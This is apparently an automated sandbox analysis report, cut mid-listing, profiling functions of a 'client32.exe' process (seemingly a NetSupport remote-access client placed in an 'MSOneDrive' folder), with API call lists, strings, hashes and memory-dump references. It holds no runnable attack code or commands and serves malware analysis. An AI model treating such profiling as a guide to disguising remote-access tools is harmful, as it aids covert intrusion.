                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                        • String ID:
                                                        • API String ID: 1903512896-0
                                                        • Opcode ID: f54cc67ce8688082e8d9bd7ceb245565d37858412d515c724044303615fa1441
                                                        • Instruction ID: 5d0285bcf9a9339dda167f9027b4ec7cc5a21a28eaa690855b6058ef89d625f1
                                                        • Opcode Fuzzy Hash: f54cc67ce8688082e8d9bd7ceb245565d37858412d515c724044303615fa1441
                                                        • Instruction Fuzzy Hash: D08151B5900209AFDB10DFA4CC85FBFF7B9EB88305F104A18F611E7285D670A945CBA1
                                                        Function 110B7260 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 266librarycomloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89), ref: 110B728D
                                                        • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110B72DA
                                                        • SetLastError.KERNEL32(00000078), ref: 110B72F5
                                                        • SystemParametersInfoA.USER32(00000010,00000000,?,00000000), ref: 110B730C
                                                        • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110B7318
                                                        • OleInitialize.OLE32(00000000), ref: 110B7354
                                                        • LoadAcceleratorsA.USER32(00000000,00003330), ref: 110B741C
                                                        • UpdateWindow.USER32(?), ref: 110B7486
                                                        • OleUninitialize.OLE32 ref: 110B7507
                                                        • GetProcAddress.KERNEL32(?,SetThreadExecutionState), ref: 110B751B
                                                        • SetLastError.KERNEL32(00000078), ref: 110B7533
                                                        • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 110B7544
                                                        • FreeLibrary.KERNEL32(?,?), ref: 110B7572
                                                          • Part of subcall function 110B0B60: GetWindowPlacement.USER32(?,0000002C,75A37AA0), ref: 110B0B9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoParametersSystem$AddressErrorLastLibraryLoadProcWindow$AcceleratorsFreeInitializePlacementUninitializeUpdate
                                                        • String ID: ..\CTL32\NSMCobrowse.cpp$1601$FALSE$Kernel32.dll$NSMCobrowse$SetThreadExecutionState$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 3244972839-2715558161
                                                        • Opcode ID: f1869e9ace16bcabbdf441272b9f7ccf41929b43d66111c24cabc24926d86a2b
                                                        • Instruction ID: f8ce5fb705e420c25b78c7aa5baaf6ec852ae9732c421639fd8232ddcd28cd9c
                                                        • Opcode Fuzzy Hash: f1869e9ace16bcabbdf441272b9f7ccf41929b43d66111c24cabc24926d86a2b
                                                        • Instruction Fuzzy Hash: 8C91A0B9E00659AFDB01DFA5CCC0AAEFBF4BF08308F54492DE515A7281DB306941CBA5
                                                        Function 110B1070 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 257windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134770: _memset.LIBCMT ref: 111347B5
                                                          • Part of subcall function 11134770: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
                                                          • Part of subcall function 11134770: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
                                                          • Part of subcall function 11134770: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
                                                          • Part of subcall function 11134770: FreeLibrary.KERNEL32(00000000), ref: 1113481F
                                                          • Part of subcall function 11134770: GetSystemDefaultLangID.KERNEL32 ref: 1113482A
                                                        • LoadMenuA.USER32(00000000,000032E2), ref: 110B11C0
                                                        • CreateWindowExA.USER32(00000000,NSMCobrMain,?,04CF0000,80000000,80000000,00000190,000001F4,00000000,00000000,?,00000000), ref: 110B11F5
                                                        • SetWindowPlacement.USER32(?,0000002C,00000000,?,?,00000000), ref: 110B1299
                                                        • GetMenu.USER32(?), ref: 110B12E3
                                                        • DeleteMenu.USER32(00000000,00000004,00000400,?,?,00000000), ref: 110B12ED
                                                        • GetWindowPlacement.USER32(?,0000002C,?,?,00000000), ref: 110B132E
                                                        • GetMenu.USER32(?), ref: 110B1380
                                                        • GetMenuItemCount.USER32(00000000), ref: 110B138A
                                                        • DeleteMenu.USER32(00000000,-00000001,?,?,00000000), ref: 110B1393
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • UpdateWindow.USER32(?), ref: 110B13D5
                                                        • BringWindowToTop.USER32(?), ref: 110B13DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$Window$DeleteLibraryLoadPlacement$AddressBringCountCreateDefaultErrorExitFreeItemLangLastMessageProcProcessSystemUpdateVersion_memsetwsprintf
                                                        • String ID: *StartPage$*WindowPos$,$..\CTL32\NSMCobrowse.cpp$IsA()$NSMCobrMain$about:blank$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2603857032-544735205
                                                        • Opcode ID: 6ce295a978d4c0f578fdcd161a0048bff9384069b6bc0b2638a1909efe396e8a
                                                        • Instruction ID: 0b238a22b308422866b6e53ee66487a0a9e71651472ee473fa52922344df5796
                                                        • Opcode Fuzzy Hash: 6ce295a978d4c0f578fdcd161a0048bff9384069b6bc0b2638a1909efe396e8a
                                                        • Instruction Fuzzy Hash: D791B078B00706AFD721DF61DC80FDAF3B5AF48708F008998E6569B685EB70B944CB95
                                                        Function 110851E0 Relevance: 36.2, APIs: 24, Instructions: 245memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 11085218
                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 1108522A
                                                        • HeapAlloc.KERNEL32(00000000), ref: 11085231
                                                        • GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
                                                        • GetUserObjectSecurity.USER32(00000001,00000004,00000000,00000001,00000001), ref: 11085265
                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 11085271
                                                        • HeapAlloc.KERNEL32(00000000), ref: 11085278
                                                        • GetUserObjectSecurity.USER32(00000001,00000004,?,00000001,00000001), ref: 1108528E
                                                        • GetSecurityDescriptorDacl.ADVAPI32(110855CC,00000000,?,?), ref: 110852B0
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00000000,?,?), ref: 110852C9
                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108533F
                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 11085357
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085379
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085395
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 110853B5
                                                        • SetUserObjectSecurity.USER32(00000001,00000004,?), ref: 110853CF
                                                        • GetProcessHeap.KERNEL32(00000000,110855CC), ref: 110853E9
                                                        • HeapFree.KERNEL32(00000000), ref: 110853EC
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 110853F8
                                                        • HeapFree.KERNEL32(00000000), ref: 110853FB
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 11085407
                                                        • HeapFree.KERNEL32(00000000), ref: 1108540A
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 11085416
                                                        • HeapFree.KERNEL32(00000000), ref: 11085419
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HeapSecurity$DescriptorObjectProcessUser$DaclFree$AllocInitialize
                                                        • String ID:
                                                        • API String ID: 3868453208-0
                                                        • Opcode ID: a825820c58583e875331af90eeb360339016fbb48d06a2a4b775561e61e6bd06
                                                        • Instruction ID: 017101d2f13020300e76833adeebb0b818ce4fdc5b6587dcfb92681743389174
                                                        • Opcode Fuzzy Hash: a825820c58583e875331af90eeb360339016fbb48d06a2a4b775561e61e6bd06
                                                        • Instruction Fuzzy Hash: 30810BB2D04219AFEB11DBD8CC90FEFB7BCEF48714F118559E900A7244D6B5AE458BA0
                                                        Function 1104D640 Relevance: 35.4, APIs: 11, Strings: 9, Instructions: 447windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 1104D6D7
                                                        • _malloc.LIBCMT ref: 1104D960
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • _memmove.LIBCMT ref: 1104D983
                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001042A,?,00000002,00002710,00000000), ref: 1104D9EA
                                                        • _free.LIBCMT ref: 1104D6F5
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                          • Part of subcall function 11037950: GetDateFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000020,82E0FB89,?,?,00000000,?,00000000,1116DED1,000000FF,?,1104DB2D), ref: 1103798F
                                                          • Part of subcall function 11037950: GetTimeFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000010,?,1104DB2D,?,?,000003EF,00000000), ref: 110379A4
                                                        • _malloc.LIBCMT ref: 1104D716
                                                        • _memmove.LIBCMT ref: 1104D726
                                                        • GetTickCount.KERNEL32 ref: 1104D72E
                                                        • IsWindow.USER32(?), ref: 1104D81E
                                                        • _free.LIBCMT ref: 1104D9F1
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,000003EF,00000000,?,?,?,?,?,?), ref: 1104DB3F
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$CountFormatHeapTick_malloc_memmove$AllocateDateErrorFileFreeLastMessageModuleNameSendTimeTimeoutWindow
                                                        • String ID: Client$DisableMessage$IsA()$Result of SendMessage %d$Send Message to StudentUI$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$pcicl32.dll$toastImageAndText.png$toastMessage.png
                                                        • API String ID: 1763481038-1556842855
                                                        • Opcode ID: d71bba76b178c5dc766708e327a9ff06053e3c4114c2f30c4ebe94e99cfb6490
                                                        • Instruction ID: dd68662fa2b7b78e02f42c071c2c91de2c128a2af9df8d519f107d9f1f1afb16
                                                        • Opcode Fuzzy Hash: d71bba76b178c5dc766708e327a9ff06053e3c4114c2f30c4ebe94e99cfb6490
                                                        • Instruction Fuzzy Hash: 48029D74E0521A9FDB15DB64CDD8FDEB7B4AF58308F1081E8D80A97281EB70AA44CF61
                                                        Function 11029730 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110E2140: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C
                                                          • Part of subcall function 110C4D10: _malloc.LIBCMT ref: 110C4D2A
                                                          • Part of subcall function 110E1DB0: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110E1DFB
                                                        • wsprintfA.USER32 ref: 11029ABD
                                                          • Part of subcall function 110E2510: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,11029895), ref: 110E2546
                                                        • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 110298CA
                                                        • wsprintfA.USER32 ref: 1102990E
                                                        • wsprintfA.USER32 ref: 11029975
                                                          • Part of subcall function 110E2B90: wsprintfA.USER32 ref: 110E2BF4
                                                          • Part of subcall function 110E2B90: _malloc.LIBCMT ref: 110E2C73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                        • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$set %s=15, e=%d
                                                        • API String ID: 2153351953-2541246523
                                                        • Opcode ID: ea49658e0559d7249552271ef26cbc16e8dfc3201216cf4df3aa1f849712d45b
                                                        • Instruction ID: 211f1d13b54fd8d85df03bceff53a25590f38c713c6c8c7458dc0526dc1957da
                                                        • Opcode Fuzzy Hash: ea49658e0559d7249552271ef26cbc16e8dfc3201216cf4df3aa1f849712d45b
                                                        • Instruction Fuzzy Hash: 5CB16F75D0162AAFDB21EB51CD88FEEB778AF44748F4041D9E909A2181EB706F84CF61
                                                        Function 11133230 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 281COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 11133298
                                                        • RaiseException.KERNEL32(80000003,00000000,00000000,00000000), ref: 111332E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountExceptionRaiseTick
                                                        • String ID: %d.$C:\Users\user\AppData\Local\MSOneDrive\client32.exe$Support\$_%04d_%02d_%02d_%02d%02d%02d.dmp
                                                        • API String ID: 473833368-2752259210
                                                        • Opcode ID: eb20b46de86263ce3c0fc2cb08518a1f7edc3ee7639162ab589458b7dc855a32
                                                        • Instruction ID: b1318081cbd1093ae19426a44e825ea54fb6d23b40abf42cfb15725aaffc0af2
                                                        • Opcode Fuzzy Hash: eb20b46de86263ce3c0fc2cb08518a1f7edc3ee7639162ab589458b7dc855a32
                                                        • Instruction Fuzzy Hash: 1EA11871918659AFDB22CF24CC44BDAF7F4BB88715F108298E959A73C4EB309A44CB94
                                                        Function 111357E0 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11135815
                                                        • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 11135846
                                                        • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 11135854
                                                        • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 11135862
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 111358B3
                                                        • GetTickCount.KERNEL32 ref: 11135920
                                                        • GetTickCount.KERNEL32 ref: 11135943
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                        • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                        • API String ID: 132346978-2450594007
                                                        • Opcode ID: 24e3902290bdfb9d156e41673af9ed8a99b6ed7f6cf7d5ae5b40d77d50fcf9c2
                                                        • Instruction ID: 59b0643e97b9a631c3f20454355d2f3f74fc8d6a298a7c9c16ab6adfcb60d694
                                                        • Opcode Fuzzy Hash: 24e3902290bdfb9d156e41673af9ed8a99b6ed7f6cf7d5ae5b40d77d50fcf9c2
                                                        • Instruction Fuzzy Hash: 89917975A152289FDB60CF28C894ADAFBB4EF89725F0180E9E94D97355D7309E80CF90
                                                        Function 1101B1C0 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 203COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BeginPaint.USER32(?,?), ref: 1101B20C
                                                        • GetClientRect.USER32(00000000,?), ref: 1101B23A
                                                        • CreateSolidBrush.GDI32(?), ref: 1101B244
                                                        • FillRect.USER32(?,?,00000000), ref: 1101B258
                                                        • GetStockObject.GDI32(00000011), ref: 1101B269
                                                        • SelectObject.GDI32(?,00000000), ref: 1101B27A
                                                        • DrawTextA.USER32(?,00000000,000000FF,?,00000001), ref: 1101B2A3
                                                        • SelectObject.GDI32(?,00000000), ref: 1101B2AE
                                                        • DeleteObject.GDI32(?), ref: 1101B3AC
                                                        • EndPaint.USER32(?,?), ref: 1101B3BA
                                                          • Part of subcall function 1114D430: SetWindowLongA.USER32(?,000000FC,?), ref: 1114D476
                                                          • Part of subcall function 1114D430: RemovePropA.USER32(?), ref: 1114D495
                                                          • Part of subcall function 1114D430: RemovePropA.USER32(?), ref: 1114D4A4
                                                          • Part of subcall function 1114D430: RemovePropA.USER32(?,00000000), ref: 1114D4B3
                                                        Strings
                                                        • NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B31C
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B220
                                                        • picholder w=%d, h=%d, xrefs: 1101B339
                                                        • m_hWnd, xrefs: 1101B225
                                                        • NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2F7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
